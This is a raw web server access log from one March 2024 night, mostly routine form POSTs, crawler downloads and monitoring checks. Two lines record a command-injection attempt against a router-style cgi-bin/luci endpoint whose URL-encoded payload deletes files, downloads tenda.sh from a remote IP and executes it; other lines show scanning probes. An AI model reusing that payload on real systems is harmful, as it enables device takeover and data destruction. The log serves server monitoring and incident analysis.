201.245.192.253 - - [08/Mar/2024:02:33:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:33:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:33:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:34:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:02:32:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Mar/2024:02:35:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:35:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:33:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
201.245.192.253 - - [08/Mar/2024:02:35:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:37:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:37:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:39:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39583
201.245.192.253 - - [08/Mar/2024:02:39:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:39:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:39:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:40:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:40:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:39:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39697
172.22.2.4 - - [08/Mar/2024:02:38:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:02:40:55 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:40:55 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
52.167.144.229 - - [08/Mar/2024:02:40:57 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/EL-Burro-B-1-1024x576.jpg HTTP/1.1" 200 120653
172.22.2.4 - - [08/Mar/2024:02:39:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [08/Mar/2024:02:41:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:41:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:43:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:43:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:45:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:45:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:45:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:44:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [08/Mar/2024:02:45:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:46:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:02:44:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:02:45:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [08/Mar/2024:02:47:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:47:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:49:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:49:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:50:02 -0500] "HEAD / HTTP/1.1" 200 -
203.2.64.59 - - [08/Mar/2024:02:50:28 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [08/Mar/2024:02:51:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:51:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:51:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:50:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:02:51:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [08/Mar/2024:02:53:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:53:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:55:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:55:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:55:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:56:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:57:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:57:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:56:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.120.134.32 - - [08/Mar/2024:02:58:43 -0500] "GET /Publicaciones/2024EE31913.pdf HTTP/1.1" 404 227
172.22.2.4 - - [08/Mar/2024:02:57:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:02:59:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:59:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:00:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:01:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [08/Mar/2024:03:01:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:01:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:02:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:03:02:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [08/Mar/2024:03:02:29 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Mar/2024:03:02:30 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Mar/2024:03:02:30 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Mar/2024:03:02:30 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [08/Mar/2024:03:03:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:03:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:03:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:02:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:03:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
216.245.221.92 - - [08/Mar/2024:03:05:02 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.50 - - [08/Mar/2024:03:05:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/0824.pdf HTTP/1.1" 304 -
17.241.219.7 - - [08/Mar/2024:03:05:13 -0500] "GET /secretaria-de-ambiente-lanza-convocatoria-para-el-programa-de-excelencia-ambiental-distrital-pread-2024.html HTTP/1.1" 200 958
201.245.192.253 - - [08/Mar/2024:03:05:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:05:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [08/Mar/2024:03:05:58 -0500] "GET /Publicaciones/2024EE17640.pdf HTTP/1.1" 404 227
40.77.167.50 - - [08/Mar/2024:03:06:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0614.pdf HTTP/1.1" 200 373901
201.245.192.253 - - [08/Mar/2024:03:07:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:07:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
152.203.226.168 - - [08/Mar/2024:03:07:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 638566
152.203.226.168 - - [08/Mar/2024:03:07:54 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
152.203.226.168 - - [08/Mar/2024:03:07:54 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
152.203.226.168 - - [08/Mar/2024:03:07:54 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
152.203.226.168 - - [08/Mar/2024:03:07:55 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
201.245.192.253 - - [08/Mar/2024:03:08:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:09:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:07:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:09:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:10:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:08:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [08/Mar/2024:03:11:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:11:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:13:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:13:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:13:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:15:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:15:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:13:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.20 - - [08/Mar/2024:03:15:31 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [08/Mar/2024:03:15:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:14:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:03:17:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:17:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:18:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
207.46.13.168 - - [08/Mar/2024:03:19:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/1043.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Mar/2024:03:19:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39703
201.245.192.253 - - [08/Mar/2024:03:19:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39737
201.245.192.253 - - [08/Mar/2024:03:19:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
201.245.192.253 - - [08/Mar/2024:03:19:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:19:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:20:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
172.22.2.4 - - [08/Mar/2024:03:19:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:21:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:21:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:21:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:20:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:03:20:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:03:22:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:03:22:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [08/Mar/2024:03:23:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:23:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:25:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:25:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:25:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
80.66.88.215 - - [08/Mar/2024:03:26:08 -0500] "\x03" 400 226
66.249.66.19 - - [08/Mar/2024:03:26:13 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/D/Directiva4del22deMayode2009/Directiva4del22deMayode2009.asp?IdArticulo=6469 HTTP/1.1" 200 527
66.249.66.21 - - [08/Mar/2024:03:26:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1532.pdf HTTP/1.1" 200 508534
172.22.2.4 - - [08/Mar/2024:03:25:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:27:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.77 - - [08/Mar/2024:03:27:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0961.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Mar/2024:03:27:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:26:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:03:28:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:29:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39737
201.245.192.253 - - [08/Mar/2024:03:29:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
201.245.192.253 - - [08/Mar/2024:03:27:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39703
201.245.192.253 - - [08/Mar/2024:03:29:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:29:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:29:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
216.245.221.92 - - [08/Mar/2024:03:30:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
201.245.192.253 - - [08/Mar/2024:03:31:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:31:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:31:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:33:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:33:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:32:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
101.47.80.24 - - [08/Mar/2024:03:33:46 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Recorrido-virtual-Aula-Soratama.mp4 HTTP/1.1" 200 5687960
52.165.219.102 - - [08/Mar/2024:03:34:31 -0500] "GET /robots.txt HTTP/1.1" 404 1035
216.245.221.92 - - [08/Mar/2024:03:35:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:35:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:35:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:35:42 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
